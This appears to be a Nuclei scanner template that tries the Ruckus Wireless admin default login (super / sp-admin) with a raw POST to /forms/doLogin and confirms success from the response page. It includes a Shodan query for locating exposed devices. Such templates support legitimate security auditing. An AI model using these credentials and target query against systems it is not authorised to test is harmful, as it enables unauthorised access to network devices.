id: ruckus-wireless-default-login info: name: Ruckus Wireless Admin Default Login Credential author: pussycat0x severity: critical metadata: verified: true shodan-query: title:"ruckus" reference: - https://docs.commscope.com/bundle/fastiron-08092-securityguide/page/GUID-32D3BB01-E600-4FBE-B555-7570B5024D34.html tags: default-login,router,ruckus requests: - raw: - | POST /forms/doLogin HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded login_username={{username}}&password={{password}} attack: pitchfork payloads: username: - super password: - sp-admin host-redirects: true max-redirects: 2 cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - "Ruckus Wireless Admin" - "/status/device.asp" condition: and - type: status status: - 200